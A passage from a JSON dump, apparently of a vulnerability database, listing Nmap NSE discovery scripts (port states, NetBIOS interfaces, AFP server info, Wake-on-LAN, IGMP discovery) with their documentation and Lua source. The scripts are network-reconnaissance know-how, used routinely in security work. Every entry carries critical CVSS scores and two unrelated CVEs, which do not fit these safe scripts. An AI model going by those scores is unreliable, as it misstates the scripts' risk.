key=\"closed\">7,9,13,21,23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024</elem>\n-- </table>\n-- <table key=\"udp\">\n-- <elem key=\"open|filtered\">68,631,5353</elem>\n-- <elem key=\"closed\">7,9,17,19,49,53,67,69,80,88,111,120,123,135-139,158,161-162,177,427,443,445,497,500,514-515,518,520,593,623,626,996-999,1022-1023,1025-1030,1433-1434,1645-1646,1701,1718-1719,1812-1813,1900,2000,2048-2049,2222-2223,3283,3456,3703,4444,4500,5000,5060,5632,9200,10000,17185,20031,30718,31337,32768-32769,32771,32815,33281,49152-49154,49156,49181-49182,49185-49186,49188,49190-49194,49200-49201,65024</elem>\n-- </table>\n\nauthor = \"Daniel Miller\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"safe\" }\n\n-- the hostrule iterates over open ports for the host\nhostrule = function() return true end\n\nlocal states = {\n \"open\",\n \"open|filtered\",\n \"filtered\",\n \"unfiltered\",\n \"closed\",\n \"closed|filtered\"\n}\nlocal protos = {\n \"tcp\", \"udp\", \"sctp\"\n}\n\naction = function(host)\n local out = stdnse.output_table()\n for _, p in ipairs(protos) do\n local proto_out = stdnse.output_table()\n for _, s in ipairs(states) do\n local t = {}\n local port = nmap.get_ports(host, nil, p, s)\n while port do\n local rstart = port.number\n local prev\n repeat\n prev = port.number\n port = nmap.get_ports(host, port, p, s)\n if not port then break end\n until (port.number > prev + 1)\n if prev > rstart then\n t[#t+1] = (\"%d-%d\"):format(rstart, prev)\n else\n t[#t+1] = tostring(rstart)\n end\n end\n if #t > 0 then\n proto_out[s] = table.concat(t, \",\")\n end\n end\n if #proto_out > 0 then\n out[p] = proto_out\n end\n end\n if #out > 0 then\n return out\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:21", "description": "Retrieves IP addresses of the target's network interfaces via NetBIOS NS. Additional network interfaces may reveal more information about the target, including finding paths to hidden non-routed networks via multihomed systems.\n\n## Example Usage \n \n \n nmap -sU -p 137 --script nbns-interfaces <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 137/udp open netbios-ns\n | nbns-interfaces:\n | hostname: NOTEBOOK-NB3\n | interfaces:\n | 10.5.4.89\n | 192.168.56.1\n |_ 172.24.80.1\n MAC Address: 9C:7B:EF:AA:BB:CC (Hewlett Packard)\n \n\n## Requires \n\n * [shortport](<../lib/shortport.html>)\n * [netbios](<../lib/netbios.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-30T03:51:21", "type": "nmap", "title": "nbns-interfaces NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-12-30T03:51:21", "id": "NMAP:NBNS-INTERFACES.NSE", "href": "https://nmap.org/nsedoc/scripts/nbns-interfaces.html", "sourceData": "local shortport = require \"shortport\"\nlocal netbios = require \"netbios\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nRetrieves IP addresses of the target's network interfaces via NetBIOS NS.\nAdditional network interfaces may reveal more information about the target,\nincluding finding paths to hidden non-routed networks via multihomed systems.\n]]\n\n---\n-- @usage\n-- nmap -sU -p 137 --script nbns-interfaces <host>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 137/udp open netbios-ns\n-- | nbns-interfaces:\n-- | hostname: NOTEBOOK-NB3\n-- | interfaces:\n-- | 10.5.4.89\n-- | 192.168.56.1\n-- |_ 172.24.80.1\n-- MAC Address: 9C:7B:EF:AA:BB:CC (Hewlett Packard)\n--\n-- @xmloutput\n-- <elem key=\"hostname\">NOTEBOOK-NB3</elem>\n-- <table key=\"interfaces\">\n-- <elem>10.5.4.89</elem>\n-- <elem>192.168.56.1</elem>\n-- <elem>172.24.80.1</elem>\n-- </table>\n---\n\nauthor = {\"Andrey Zhukov from USSC\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"default\", \"discovery\", \"safe\"}\n\nportrule = nmap.address_family() == 'inet' -- NBNS is IPv4 only\n and shortport.portnumber(137, \"udp\")\n or function () return false end\n\nget_ip = function (buf)\n return table.concat({buf:byte(1, 4)}, \".\")\nend\n\naction = function (host)\n local output = stdnse.output_table()\n local status, server_name = netbios.get_server_name(host)\n if not (status and server_name) then\n return stdnse.format_output(false, \"Failed to get NetBIOS server name of the target\")\n end\n local status, result = netbios.nbquery(host, server_name)\n if not status then\n return stdnse.format_output(false, \"Failed to get remote network interfaces\")\n end\n output.hostname = server_name\n output.interfaces = {}\n for _, v in ipairs(result) do\n for i=1, #v.data, 6 do\n output.interfaces[#output.interfaces + 1] = get_ip(v.data:sub(i+2, i+2+3))\n end\n end\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:41", "description": "Shows AFP server information. This information includes the server's hostname, IPv4 and IPv6 addresses, and hardware type (for example `Macmini` or `MacBookPro`).\n\n## Script Arguments \n\n#### afp.password, afp.username \n\nSee the documentation for the [afp](<../lib/afp.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV -sC <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 548/tcp open afp\n | afp-serverinfo:\n | Server Flags:\n | Flags hex: 0x837d\n | Super Client: true\n | UUIDs: false\n | UTF8 Server Name: true\n | Open Directory: true\n | Reconnect: false\n | Server Notifications: true\n | TCP/IP: true\n | Server Signature: true\n | Server Messages: true\n | Password Saving Prohibited: true\n | Password Changing: false\n | Copy File: true\n | Server Name: foobardigital\n | Machine Type: Netatalk\n | AFP Versions: AFPVersion 1.1, AFPVersion 2.0, AFPVersion 2.1, AFP2.2, AFPX03, AFP3.1\n | UAMs: DHX2\n | Server Signature: bbeb480e00000000bbeb480e00000000\n | Network Addresses:\n | 192.0.2.235\n | foobardigital.com\n |_ UTF8 Server Name: foobardigital\n \n\n## Requires \n\n * [afp](<../lib/afp.html>)\n * [nmap](<../lib/nmap.html>)\n * [outlib](<../lib/outlib.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-03-30T19:26:23", "type": "nmap", "title": "afp-serverinfo NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-01-19T16:37:36", "id": "NMAP:AFP-SERVERINFO.NSE", "href": "https://nmap.org/nsedoc/scripts/afp-serverinfo.html", "sourceData": "local afp = require \"afp\"\nlocal nmap = require \"nmap\"\nlocal outlib = require \"outlib\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nShows AFP server information. This information includes the server's\nhostname, IPv4 and IPv6 addresses, and hardware type (for example\n<code>Macmini</code> or <code>MacBookPro</code>).\n]]\n\n---\n-- @output\n-- PORT STATE SERVICE\n-- 548/tcp open afp\n-- | afp-serverinfo:\n-- | Server Flags:\n-- | Flags hex: 0x837d\n-- | Super Client: true\n-- | UUIDs: false\n-- | UTF8 Server Name: true\n-- | Open Directory: true\n-- | Reconnect: false\n-- | Server Notifications: true\n-- | TCP/IP: true\n-- | Server Signature: true\n-- | Server Messages: true\n-- | Password Saving Prohibited: true\n-- | Password Changing: false\n-- | Copy File: true\n-- | Server Name: foobardigital\n-- | Machine Type: Netatalk\n-- | AFP Versions: AFPVersion 1.1, AFPVersion 2.0, AFPVersion 2.1, AFP2.2, AFPX03, AFP3.1\n-- | UAMs: DHX2\n-- | Server Signature: bbeb480e00000000bbeb480e00000000\n-- | Network Addresses:\n-- | 192.0.2.235\n-- | foobardigital.com\n-- |_ UTF8 Server Name: foobardigital\n--\n-- @xmloutput\n-- <table key=\"Server Flags\">\n-- <elem key=\"Flags hex\">0x837d</elem>\n-- <elem key=\"Super Client\">true</elem>\n-- <elem key=\"UUIDs\">false</elem>\n-- <elem key=\"UTF8 Server Name\">true</elem>\n-- <elem key=\"Open Directory\">true</elem>\n-- <elem key=\"Reconnect\">false</elem>\n-- <elem key=\"Server Notifications\">true</elem>\n-- <elem key=\"TCP/IP\">true</elem>\n-- <elem key=\"Server Signature\">true</elem>\n-- <elem key=\"Server Messages\">true</elem>\n-- <elem key=\"Password Saving Prohibited\">true</elem>\n-- <elem key=\"Password Changing\">false</elem>\n-- <elem key=\"Copy File\">true</elem>\n-- </table>\n-- <elem key=\"Server Name\">foobardigital</elem>\n-- <elem key=\"Machine Type\">Netatalk</elem>\n-- <table key=\"AFP Versions\">\n-- <elem>AFPVersion 1.1</elem>\n-- <elem>AFPVersion 2.0</elem>\n-- <elem>AFPVersion 2.1</elem>\n-- <elem>AFP2.2</elem>\n-- <elem>AFPX03</elem>\n-- <elem>AFP3.1</elem>\n-- </table>\n-- <table key=\"UAMs\">\n-- <elem>DHX2</elem>\n-- </table>\n-- <elem key=\"Server Signature\">\n-- bbeb480e00000000bbeb480e00000000</elem>\n-- <table key=\"Network Addresses\">\n-- <elem>192.0.2.235</elem>\n-- <elem>foobardigital.com</elem>\n-- </table>\n-- <elem key=\"UTF8 Server Name\">foobardigital</elem>\n\n-- Version 0.2\n-- Created 2010/02/09 - v0.1 - created by Andrew Orr\n-- Revised 2010/02/10 - v0.2 - added checks for optional fields\n-- Revised 2015/02/25 - v0.3 - XML structured output\n\nauthor = \"Andrew Orr\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(548, \"afp\")\n\naction = function(host, port)\n\n local socket = nmap.new_socket()\n local status\n local result = stdnse.output_table()\n local temp\n\n -- set a reasonable timeout value\n socket:set_timeout(5000)\n\n -- do some exception handling / cleanup\n local catch = function()\n socket:close()\n end\n\n local try = nmap.new_try(catch)\n\n try( socket:connect(host, port) )\n\n -- get our data\n local afp_proto = afp.Proto:new( { socket=socket } )\n\n local response = afp_proto:fp_get_server_info( socket )\n response = response.result\n\n -- all the server information is output in the order it occurs in the server\n -- response. It might be better rearranged?\n\n -- output the server flags nicely\n -- Would like to just pass response.flags, but key ordering would be more\n -- work than it's worth.\n local flags = stdnse.output_table()\n flags[\"Flags hex\"] = (\"0x%04x\"):format(response.flags.raw)\n flags[\"Super Client\"] = response.flags.SuperClient\n flags[\"UUIDs\"] = response.flags.UUIDs\n flags[\"UTF8 Server Name\"] = response.flags.UTF8ServerName\n flags[\"Open Directory\"] = response.flags.OpenDirectory\n flags[\"Reconnect\"] = response.flags.Reconnect\n flags[\"Server Notifications\"] = response.flags.ServerNotifications\n flags[\"TCP/IP\"] = response.flags.TCPoverIP\n flags[\"Server Signature\"] = response.flags.ServerSignature\n flags[\"Server Messages\"] = response.flags.ServerMessages\n flags[\"Password Saving Prohibited\"] = response.flags.NoPasswordSaving\n flags[\"Password Changing\"] = response.flags.ChangeablePasswords\n flags[\"Copy File\"] = response.flags.CopyFile\n\n result[\"Server Flags\"] = flags\n\n -- other info\n result[\"Server Name\"] = response.server_name\n result[\"Machine Type\"] = response.machine_type\n\n -- list the supported AFP versions\n result[\"AFP Versions\"] = response.afp_versions\n outlib.list_sep(result[\"AFP Versions\"])\n\n -- list the supported UAMs (User Authentication Modules)\n result[\"UAMs\"] = response.uams\n outlib.list_sep(result[\"UAMs\"])\n\n -- server signature, not sure of the format here so just showing a hex string\n if response.flags.ServerSignature then\n result[\"Server Signature\"] = stdnse.tohex(response.server_signature)\n end\n\n -- listing the network addresses one line each\n -- the default for Mac OS X AFP server is to bind everywhere, so this will\n -- list all network interfaces that the machine has\n if response.network_addresses_count > 0 then\n result[\"Network Addresses\"] = response.network_addresses\n end\n\n -- similar to above\n if response.directory_names_count > 0 then\n result[\"Directory Names\"] = response.directory_names\n end\n\n -- and finally the utf8 server name\n if response.flags.UTF8ServerName then\n result[\"UTF8 Server Name\"] = response.utf8_server_name\n end\n\n return result\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:42", "description": "Wakes a remote system up from sleep by sending a Wake-On-Lan packet.\n\n## Script Arguments \n\n#### broadcast-wake-on-lan.address \n\nThe broadcast address to which the WoL packet is sent.\n\n#### broadcast-wake-on-lan.MAC \n\nThe MAC address of the remote system to wake up\n\n## Example Usage \n \n \n nmap --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC='00:12:34:56:78:9A'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-wake-on-lan:\n |_ Sent WOL packet to: 10:9a:dd:a8:40:24\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-12-16T18:00:34", "type": "nmap", "title": "broadcast-wake-on-lan NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-24T22:05:52", "id": "NMAP:BROADCAST-WAKE-ON-LAN.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-wake-on-lan.html", "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\n\ndescription = [[\nWakes a remote system up from sleep by sending a Wake-On-Lan packet.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-wake-on-lan --script-args broadcast-wake-on-lan.MAC='00:12:34:56:78:9A'\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-wake-on-lan:\n-- |_ Sent WOL packet to: 10:9a:dd:a8:40:24\n--\n-- @args broadcast-wake-on-lan.MAC The MAC address of the remote system to wake up\n-- @args broadcast-wake-on-lan.address The broadcast address to which the WoL packet is sent.\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\nlocal MAC = stdnse.get_script_args(\"broadcast-wake-on-lan.MAC\")\nlocal address = stdnse.get_script_args(\"broadcast-wake-on-lan.address\")\n\nprerule = function()\n -- only run if we are ipv4 and have a MAC\n return (MAC ~= nil and nmap.address_family() == \"inet\")\nend\n\n-- Creates the WoL packet based on the remote MAC\n-- @param mac string containing the MAC without delimiters\n-- @return packet string containing the raw packet\nlocal function createWOLPacket(mac)\n return \"\\xff\\xff\\xff\\xff\\xff\\xff\" .. string.rep(stdnse.fromhex(mac), 16)\nend\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function()\n\n local MAC_hex\n if ( MAC:match(\"%x%x:%x%x:%x%x:%x%x:%x%x:%x%x\") ) then\n MAC_hex = MAC:gsub(\":\", \"\")\n elseif( MAC:match(\"%x%x%-%x%x%-%x%x%-%x%x%-%x%x%-%x%x\") ) then\n MAC_hex = MAC:gsub(\"-\", \"\")\n else\n return fail(\"Failed to process MAC address\")\n end\n\n local host = { ip = address or \"255.255.255.255\" }\n local port = { number = 9, protocol = \"udp\" }\n local socket = nmap.new_socket(\"udp\")\n\n -- send two packets, just in case\n for i=1,2 do\n local packet = createWOLPacket(MAC_hex)\n local status, err = socket:sendto(host, port, packet)\n if ( not(status) ) then\n return fail(\"Failed to send packet\")\n end\n end\n return stdnse.format_output(true, (\"Sent WOL packet to: %s\"):format(MAC))\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:02", "description": "Discovers targets that have IGMP Multicast memberships and grabs interesting information. \n\nThe scripts works by sending IGMP Membership Query message to the 224.0.0.1 All Hosts multicast address and listening for IGMP Membership Report messages. The script then extracts all the interesting information from the report messages such as the version, group, mode, source addresses (depending on the version). \n\nThe script defaults to sending an IGMPv2 Query but this could be changed to another version (version 1 or 3) or to sending queries of all three version. If no interface was specified as a script argument or with the -e option, the script will proceed to sending queries through all the valid ethernet interfaces.\n\n## Script Arguments \n\n#### broadcast-igmp-discovery.mgroupnamesdb \n\nDatabase with multicast group names\n\n#### broadcast-igmp-discovery.version \n\nIGMP version to use. Could be `1`, `2`, `3` or `all`. Defaults to `2`\n\n#### broadcast-igmp-discovery.timeout \n\nTime to wait for reports in seconds. Defaults to `5` seconds.\n\n#### broadcast-igmp-discovery.interface \n\nNetwork interface to use.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script broadcast-igmp-discovery\n nmap --script broadcast-igmp-discovery -e wlan0\n nmap --script broadcast-igmp-discovery\n --script-args 'broadcast-igmp-discovery.version=all, broadcast-igmp-discovery.timeout=3'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-igmp-discovery:\n | 192.168.2.2\n | Interface: tap0\n | Version: 3\n | Group: 239.1.1.1\n | Mode: EXCLUDE\n | Description: Organization-Local Scope (rfc2365)\n | Group: 239.1.1.2\n | Mode: EXCLUDE\n | Description: Organization-Local Scope (rfc2365)\n | Group: 239.1.1.44\n | Mode: INCLUDE\n | Description: Organization-Local Scope (rfc2365)\n | Sources:\n | 192.168.31.1\n | 192.168.1.3\n | Interface: wlan0\n | Version: 2\n | Group: 239.255.255.250\n | Description: Organization-Local Scope (rfc2365)\n | 192.168.1.3\n | Interface: wlan0\n | Version: 2\n | Group: 239.255.255.253\n | Description: Organization-Local Scope (rfc2365)\n |_ Use the newtargets script-arg to add the results as targets\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [packet](<../lib/packet.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [target](<../lib/target.html>)\n * [coroutine](<>)\n * [string](<>)\n * [stringaux](<../lib/stringaux.html>)\n * [io](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-14T19:31:10", "type": "nmap", "title": "broadcast-igmp-discovery NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:BROADCAST-IGMP-DISCOVERY.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-igmp-discovery.html", "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal packet = require \"packet\"\nlocal ipOps = require \"ipOps\"\nlocal target = require \"target\"\nlocal coroutine = require \"coroutine\"\nlocal string = require \"string\"\nlocal stringaux = require \"stringaux\"\nlocal io = require \"io\"\n\ndescription = [[\nDiscovers targets that have IGMP Multicast memberships and grabs interesting information.\n\nThe scripts works by sending IGMP Membership Query message to the 224.0.0.1 All\nHosts multicast address and listening for IGMP Membership Report messages. The\nscript then extracts all the interesting information from the report messages\nsuch as the version, group, mode, source addresses (depending on the version).\n\nThe script defaults to sending an IGMPv2 Query but this could be changed to\nanother version (version 1 or 3) or to sending queries of all three version. If\nno interface was specified as a script argument or with the -e option, the\nscript will proceed to sending queries through all the valid ethernet\ninterfaces.\n]]\n\n---\n-- @args broadcast-igmp-discovery.timeout Time to wait for reports in seconds.\n-- Defaults to <code>5</code> seconds.\n--\n-- @args broadcast-igmp-discovery.version IGMP version to use. Could be\n-- <code>1</code>, <code>2</code>, <code>3</code> or <code>all</code>. Defaults to <code>2</code>\n--\n-- @args broadcast-igmp-discovery.interface Network interface to use.\n--\n-- @args broadcast-igmp-discovery.mgroupnamesdb Database with multicast group names\n--\n--@usage\n-- nmap --script broadcast-igmp-discovery\n-- nmap --script broadcast-igmp-discovery -e wlan0\n-- nmap --script broadcast-igmp-discovery\n-- --script-args 'broadcast-igmp-discovery.version=all, broadcast-igmp-discovery.timeout=3'\n--\n--@output\n--Pre-scan script results:\n-- | broadcast-igmp-discovery:\n-- | 192.168.2.2\n-- | Interface: tap0\n-- | Version: 3\n-- | Group: 239.1.1.1\n-- | Mode: EXCLUDE\n-- | Description: Organization-Local Scope (rfc2365)\n-- | Group: 239.1.1.2\n-- | Mode: EXCLUDE\n-- | Description: Organization-Local Scope (rfc2365)\n-- | Group: 239.1.1.44\n-- | Mode: INCLUDE\n-- | Description: Organization-Local Scope (rfc2365)\n-- | Sources:\n-- | 192.168.31.1\n-- | 192.168.1.3\n-- | Interface: wlan0\n-- | Version: 2\n-- | Group: 239.255.255.250\n-- | Description: Organization-Local Scope (rfc2365)\n-- | 192.168.1.3\n-- | Interface: wlan0\n-- | Version: 2\n-- | Group: 239.255.255.253\n-- | Description: Organization-Local Scope (rfc2365)\n-- |_ Use the newtargets script-arg to add the results as targets\n--\n\n--\n-- The Multicast Group names DB can be created by the following script:\n--\n-- #!/usr/bin/awk -f\n-- BEGIN { FS=\"<|>\"; }\n-- /<record/ { r=1; addr1=\"\"; addr2=\"\"; rfc=\"\"; }\n-- /<addr>.*-.*<\\/addr>/ { T=$3; FS=\"-\"; $0=T; addr1=$1; addr2=$2; FS=\"<|>\"; }\n-- /<addr>[^-]*<\\/addr>/ { addr1=$3; addr2=$3; }\n-- /<description>/ { desc=$3; }\n-- /<xref type=\\\"rfc\\\"/ { T=$2; FS=\"\\\"\"; $0=T; rfc=\" (\" $4 \")\"; FS=\"<|>\"; }\n-- /<\\/record/ { r=0; if (addr1) { print addr1 \"\\t\" addr2 \"\\t\" desc rfc; } }\n--\n-- wget -O- http://www.iana.org/assignments/multicast-addresses/multicast-addresses.xml | \\\n-- ./extract-mg-names >nselib/data/mgroupnames.db\n\n\nprerule = function()\n if nmap.address_family() ~= 'inet' then\n stdnse.verbose1(\"is IPv4 only.\")\n return false\n end\n if ( not(nmap.is_privileged()) ) then\n stdnse.verbose1(\"not running due to lack of privileges.\")\n return false\n end\n return true\nend\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"broadcast\"}\n\n--- Parses a raw igmp packet and return a structured packet.\n-- @param data string IGMP Raw packet.\n-- @return response table Structured igmp packet.\nlocal igmpParse = function(data)\n local index\n local response = {}\n local group, source\n -- Report type (0x12 == v1, 0x16 == v2, 0x22 == v3)\n response.type, index = string.unpack(\">B\", data, index)\n if response.type == 0x12 or response.type == 0x16 then\n -- Max response time, Checksum, Multicast group\n response.maxrt, response.checksum, response.group, index = string.unpack(\">B I2 c4\", data, index)\n response.group = ipOps.str_to_ip(response.group)\n return response\n elseif response.type == 0x22 and #data >= 12 then\n -- Skip reserved byte, Checksum, Skip reserved bytes, Number of groups\n response.checksum, response.ngroups, index = string.unpack(\">x I2 xx I2\", data, index)\n response.groups = {}\n for i=1,response.ngroups do\n group = {}\n -- Mode is either INCLUDE or EXCLUDE\n group.mode,\n -- Auxiliary data length in the group record (in 32bits units)\n group.auxdlen,\n -- Number of source addresses\n group.nsrc,\n group.address, index = string.unpack(\">BB I2 c4\", data, index)\n group.address = ipOps.str_to_ip(group.address)\n group.src = {}\n for i=1,group.nsrc do\n source, index = string.unpack(\">c4\", data, index)\n table.insert(group.src, ipOps.str_to_ip(source))\n end\n -- Skip auxiliary data\n index = index + group.auxdlen\n -- Insert group\n table.insert(response.groups, group)\n end\n return response\n end\nend\n\n--- Listens for IGMP Membership reports packets.\n-- @param interface Interface to listen on.\n-- @param timeout Amount of time to listen for.\n-- @param responses table to put valid responses into.\nlocal igmpListener = function(interface, timeout, responses)\n local condvar = nmap.condvar(responses)\n local start = nmap.clock_ms()\n local listener = nmap.new_socket()\n local p, igmp_raw, status, l3data, response, _\n local devices = {}\n listener:set_timeout(100)\n listener:pcap_open(interface.device, 1024, true, 'ip proto 2')\n\n while (nmap.clock_ms() - start) < timeout do\n status, _, _, l3data = listener:pcap_receive()\n if status then\n p = packet.Packet:new(l3data, #l3data)\n igmp_raw = string.sub(l3data, p.ip_hl*4 + 1)\n if p then\n -- check the first byte before sending to the parser\n -- response 0x12 == Membership Response version 1\n -- response 0x16 == Membership Response version 2\n -- response 0x22 == Membership Response version 3\n local igmptype = igmp_raw:byte(1)\n if igmptype == 0x12 or igmptype == 0x16 or igmptype == 0x22 then\n response = igmpParse(igmp_raw)\n if response then\n response.src = p.ip_src\n response.interface = interface.shortname\n -- Many hosts return more than one same response message\n -- this is to not output duplicates\n if not devices[response.src..response.type..(response.group or response.ngroups)] then\n devices[response.src..response.type..(response.group or response.ngroups)] = true\n table.insert(responses, response)\n end\n end\n end\n end\n end\n end\n condvar(\"signal\")\nend\n\n--- Crafts a raw IGMP packet.\n-- @param interface Source interface of the packet.\n-- @param version IGMP version. Could be 1, 2 or 3.\n-- @return string Raw IGMP packet.\nlocal igmpRaw = function(interface, version)\n -- Only 1, 2 and 3 are valid IGMP versions\n if version ~= 1 and version ~= 2 and version ~= 3 then\n stdnse.debug1(\"IGMP version %s doesn't exist.\", version)\n return\n end\n\n -- Let's craft an IGMP Membership Query\n local igmp_raw = string.pack(\">BB I2 I4\",\n 0x11, -- Membership Query, same for all versions\n version == 1 and 0 or 0x16, 